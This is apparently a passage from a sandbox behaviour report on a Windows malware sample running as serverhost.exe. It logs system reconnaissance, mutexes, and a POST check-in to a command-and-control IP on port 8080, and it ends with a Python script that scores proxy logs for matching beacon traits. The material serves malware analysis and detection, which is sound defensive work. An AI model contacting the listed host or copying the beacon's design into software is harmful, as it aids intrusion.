Create Mapping C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Map C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, desired_access = FILE_MAP_READ True 1
Fn
Service (1)
+
Operation Additional Information Success Count Logfile
Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
System (29)
+
Operation Additional Information Success Count Logfile
Get Computer Name result_out = F71GWAT True 2
Fn
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Fn
Get Time type = Ticks, time = 22011 True 1
Fn
Get Time type = Ticks, time = 23025 True 1
Fn
Get Time type = Ticks, time = 24024 True 1
Fn
Get Time type = Ticks, time = 25022 True 1
Fn
Get Time type = Ticks, time = 26020 True 1
Fn
Get Time type = Ticks, time = 27081 True 2
Fn
Get Time type = Ticks, time = 28017 True 1
Fn
Get Time type = Ticks, time = 29016 True 1
Fn
Get Time type = Ticks, time = 30014 True 1
Fn
Get Time type = Ticks, time = 31012 True 1
Fn
Get Time type = Ticks, time = 32027 True 1
Fn
Get Time type = Ticks, time = 33025 True 1
Fn
Get Time type = Ticks, time = 34023 True 1
Fn
Get Time type = Ticks, time = 35022 True 1
Fn
Get Time type = Ticks, time = 36020 True 1
Fn
Get Time type = Ticks, time = 37019 True 1
Fn
Get Time type = Ticks, time = 38017 True 1
Fn
Get Time type = Ticks, time = 39031 True 1
Fn
Get Time type = Ticks, time = 40014 True 1
Fn
Get Time type = Ticks, time = 41012 True 1
Fn
Get Time type = Ticks, time = 42026 True 1
Fn
Get Time type = Ticks, time = 43025 True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Get Info type = Operating System False 1
Fn
Get Info type = Hardware Information True 1
Fn
Mutex (4)
+
Operation Additional Information Success Count Logfile
Create mutex_name = MA991ED3B True 1
Fn
Create mutex_name = Global\I78B95E2E True 1
Fn
Create mutex_name = Global\M78B95E2E True 1
Fn
Release mutex_name = Global\I78B95E2E True 1
Fn
Network Behavior
HTTP Sessions (1)
+
Information Value
Total Data Sent 0.32 KB (330 bytes)
Total Data Received 0.15 KB (156 bytes)
Contacted Host Count 1
Contacted Hosts 167.114.121.80
HTTP Session #1
+
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Server Name 167.114.121.80
Server Port 8080
Username 0
Password 0
Data Sent 0.32 KB (330 bytes)
Data Received 0.15 KB (156 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = 167.114.121.80, server_port = 8080, user_name = 0, password = 0 True 1
Fn
Open HTTP Request http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request headers = 0 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 True 1
Fn
Data
Query HTTP Info flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 True 1
Fn
Data
Read Response size = 148, size_out = 148 True 1
Fn
Data
Read Response size = 0, size_out = 0 True 1
Fn
Close Session True 1
Fn
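The single network exchange is a check-in rather than a download: a POST straight to an IP literal on port 8080 with no headers, no cookies and a User-Agent the sample supplied itself through InternetOpen, sending 330 bytes and reading 148 bytes of response body (156 bytes on the wire). None of those traits is decisive alone, but together they are what a proxy-log hunt should score. The following is an added example (not VMRay's code and not part of the report) that runs that scoring over a constructed tab-separated proxy log; the first row mirrors the session above, the other two rows, the log format and the relative timestamps are invented for contrast.

```python
import csv
import io
import ipaddress

# The User-Agent the sample passed to InternetOpen in the session above.
REPORT_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; "
             ".NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; "
             "Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)")

# Constructed proxy log, tab-separated: time, method, host, port, path, user agent,
# bytes sent, bytes received. Row 1 mirrors the session in the report; rows 2 and 3
# are made-up benign traffic for contrast.
SAMPLE_PROXY_LOG = "\n".join([
    "\t".join(["00:02:05", "POST", "167.114.121.80", "8080", "/", REPORT_UA, "330", "156"]),
    "\t".join(["00:02:07", "GET", "www.example.com", "443", "/index.html",
               "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/52.0",
               "412", "53120"]),
    "\t".join(["00:02:09", "POST", "api.example.com", "443", "/v1/telemetry",
               "ExampleApp/2.3", "9800", "210"]),
])
FIELDS = ["time", "method", "host", "port", "path", "user_agent", "bytes_out", "bytes_in"]


def parse_proxy_log(text: str) -> list:
    """Parse the constructed log format into dicts with numeric port and byte counts."""
    reader = csv.DictReader(io.StringIO(text), fieldnames=FIELDS, delimiter="\t")
    rows = []
    for row in reader:
        row["port"] = int(row["port"])
        row["bytes_out"] = int(row["bytes_out"])
        row["bytes_in"] = int(row["bytes_in"])
        rows.append(row)
    return rows


def is_ip_literal(host: str) -> bool:
    """True when the Host is a bare IPv4/IPv6 address, i.e. no DNS lookup was needed."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def beacon_reasons(row: dict) -> list:
    """Independent traits of the report's check-in; each adds one reason."""
    reasons = []
    if is_ip_literal(row["host"]):
        reasons.append("host is an IP literal: no DNS lookup precedes the connection")
    if row["port"] not in (80, 443):
        reasons.append(f"HTTP on non-standard port {row['port']}")
    if row["method"] == "POST" and row["bytes_out"] < 1024 and row["bytes_in"] < 1024:
        reasons.append("small POST with a small reply (check-in sized exchange)")
    if row["user_agent"] == REPORT_UA:
        reasons.append("User-Agent matches the hard-coded IE 7 string from the report")
    return reasons


def flag_beacons(text: str, min_reasons: int = 3) -> list:
    """(host, port, reasons) for rows that hit at least `min_reasons` traits."""
    hits = []
    for row in parse_proxy_log(text):
        reasons = beacon_reasons(row)
        if len(reasons) >= min_reasons:
            hits.append((row["host"], row["port"], reasons))
    return hits


if __name__ == "__main__":
    for host, port, reasons in flag_beacons(SAMPLE_PROXY_LOG):
        print(f"{host}:{port}")
        for r in reasons:
            print("  -", r)
```

The exact User-Agent match is the most brittle of the four rules, since the string is a plausible real IE 7 compatibility header and a rebuilt sample can change it; the IP-literal destination on a non-standard port with a tiny POST/response pair is the part that holds up across builds, which is why the threshold lets a hit through without the UA rule.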